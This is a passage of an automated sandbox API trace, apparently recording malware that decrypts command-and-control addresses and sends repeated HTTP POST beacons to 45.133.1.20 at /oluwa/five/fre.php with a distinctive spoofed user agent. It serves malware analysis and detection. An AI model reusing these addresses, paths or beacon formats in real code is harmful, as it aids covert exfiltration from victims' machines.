pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0276.358] GetProcessHeap () returned 0x6a0000 [0276.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0276.358] socket (af=2, type=1, protocol=6) returned 0x9e4 [0276.359] connect (s=0x9e4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0276.388] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0276.388] GetProcessHeap () returned 0x6a0000 [0276.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0276.388] GetProcessHeap () returned 0x6a0000 [0276.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0276.389] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0276.390] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0276.390] GetProcessHeap () returned 0x6a0000 [0276.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba2f0 [0276.390] GetProcessHeap () returned 0x6a0000 [0276.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0276.391] GetProcessHeap () returned 0x6a0000 [0276.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0276.391] GetProcessHeap () returned 0x6a0000 [0276.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0276.392] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0276.395] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0276.395] GetProcessHeap () returned 0x6a0000 [0276.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0276.395] GetProcessHeap () returned 0x6a0000 [0276.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0276.395] send (s=0x9e4, buf=0x6bd460*, len=242, flags=0) returned 242 [0276.396] send (s=0x9e4, buf=0x6bb998*, len=159, flags=0) returned 159 [0276.396] GetProcessHeap () returned 0x6a0000 [0276.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0276.396] recv (in: s=0x9e4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0276.471] GetProcessHeap () returned 0x6a0000 [0276.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0276.482] GetProcessHeap () returned 0x6a0000 [0276.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0276.482] GetProcessHeap () returned 0x6a0000 [0276.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba2f0 | out: hHeap=0x6a0000) returned 1 [0276.483] GetProcessHeap () returned 0x6a0000 [0276.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0276.485] closesocket (s=0x9e4) returned 0 [0276.485] GetProcessHeap () returned 0x6a0000 [0276.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0276.485] GetProcessHeap () returned 0x6a0000 [0276.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.486] GetProcessHeap () returned 0x6a0000 [0276.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0276.486] GetProcessHeap () returned 0x6a0000 [0276.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0276.487] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1778) returned 0x9e4 [0276.489] Sleep (dwMilliseconds=0xea60) [0276.490] GetProcessHeap () returned 0x6a0000 [0276.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0276.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.491] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.500] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0276.507] GetProcessHeap () returned 0x6a0000 [0276.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0276.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.508] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0276.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.510] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.511] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.511] GetProcessHeap () returned 0x6a0000 [0276.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0276.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.513] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0276.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.514] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0276.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.517] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0276.517] GetProcessHeap () returned 0x6a0000 [0276.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.519] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.520] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.529] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.530] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.530] GetProcessHeap () returned 0x6a0000 [0276.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0276.530] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.531] GetProcessHeap () returned 0x6a0000 [0276.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0276.532] GetProcessHeap () returned 0x6a0000 [0276.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.532] GetProcessHeap () returned 0x6a0000 [0276.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0276.532] GetProcessHeap () returned 0x6a0000 [0276.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0276.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.534] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.543] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0276.552] GetProcessHeap () returned 0x6a0000 [0276.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0276.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.554] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0276.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.555] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.556] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.556] GetProcessHeap () returned 0x6a0000 [0276.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0276.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.558] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0276.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.561] CryptDestroyKey (hKey=0x6ad020) returned 1 [0276.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.563] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0276.563] GetProcessHeap () returned 0x6a0000 [0276.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.564] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0276.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.566] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0276.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.567] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0276.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.568] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0276.568] GetProcessHeap () returned 0x6a0000 [0276.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0276.569] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0276.569] GetProcessHeap () returned 0x6a0000 [0276.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0276.569] socket (af=2, type=1, protocol=6) returned 0x9e8 [0276.571] connect (s=0x9e8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0276.599] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0276.600] GetProcessHeap () returned 0x6a0000 [0276.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0276.600] GetProcessHeap () returned 0x6a0000 [0276.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0276.601] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0276.602] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0276.602] GetProcessHeap () returned 0x6a0000 [0276.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9db0 [0276.602] GetProcessHeap () returned 0x6a0000 [0276.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0276.602] GetProcessHeap () returned 0x6a0000 [0276.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0276.604] GetProcessHeap () returned 0x6a0000 [0276.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0276.605] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0276.606] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0276.606] GetProcessHeap () returned 0x6a0000 [0276.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0276.606] GetProcessHeap () returned 0x6a0000 [0276.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0276.607] send (s=0x9e8, buf=0x6bd460*, len=242, flags=0) returned 242 [0276.608] send (s=0x9e8, buf=0x6bb998*, len=159, flags=0) returned 159 [0276.608] GetProcessHeap () returned 0x6a0000 [0276.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0276.608] recv (in: s=0x9e8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0276.681] GetProcessHeap () returned 0x6a0000 [0276.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0276.682] GetProcessHeap () returned 0x6a0000 [0276.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0276.682] GetProcessHeap () returned 0x6a0000 [0276.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9db0 | out: hHeap=0x6a0000) returned 1 [0276.683] GetProcessHeap () returned 0x6a0000 [0276.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0276.684] closesocket (s=0x9e8) returned 0 [0276.685] GetProcessHeap () returned 0x6a0000 [0276.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0276.685] GetProcessHeap () returned 0x6a0000 [0276.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.685] GetProcessHeap () returned 0x6a0000 [0276.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0276.689] GetProcessHeap () returned 0x6a0000 [0276.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0276.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x177c) returned 0x9e8 [0276.705] Sleep (dwMilliseconds=0xea60) [0276.707] GetProcessHeap () returned 0x6a0000 [0276.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0276.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0276.727] GetProcessHeap () returned 0x6a0000 [0276.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da0d0 [0276.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.729] CryptImportKey (in: hProv=0x6beca0, pbData=0x6da0d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0276.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.730] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.731] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.731] GetProcessHeap () returned 0x6a0000 [0276.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da0d0 | out: hHeap=0x6a0000) returned 1 [0276.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.732] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0276.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.733] CryptDestroyKey (hKey=0x6ad560) returned 1 [0276.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.734] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0276.734] GetProcessHeap () returned 0x6a0000 [0276.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.735] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0276.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.736] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0276.737] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.737] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0276.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.738] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0276.738] GetProcessHeap () returned 0x6a0000 [0276.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0276.738] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0276.738] GetProcessHeap () returned 0x6a0000 [0276.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0276.739] GetProcessHeap () returned 0x6a0000 [0276.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0276.739] GetProcessHeap () returned 0x6a0000 [0276.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0276.740] GetProcessHeap () returned 0x6a0000 [0276.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0276.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.741] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0276.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.748] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0276.764] GetProcessHeap () returned 0x6a0000 [0276.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0276.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.765] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0276.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.767] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0276.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.768] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0276.768] GetProcessHeap () returned 0x6a0000 [0276.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0276.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.770] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0276.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.771] CryptDestroyKey (hKey=0x6ad020) returned 1 [0276.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0276.772] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0276.772] GetProcessHeap () returned 0x6a0000 [0276.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0276.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.773] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0276.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.775] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0276.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.776] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0276.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0276.777] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0276.777] GetProcessHeap () returned 0x6a0000 [0276.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0276.777] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0276.777] GetProcessHeap () returned 0x6a0000 [0276.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0276.777] socket (af=2, type=1, protocol=6) returned 0x9ec [0276.778] connect (s=0x9ec, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0276.803] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, 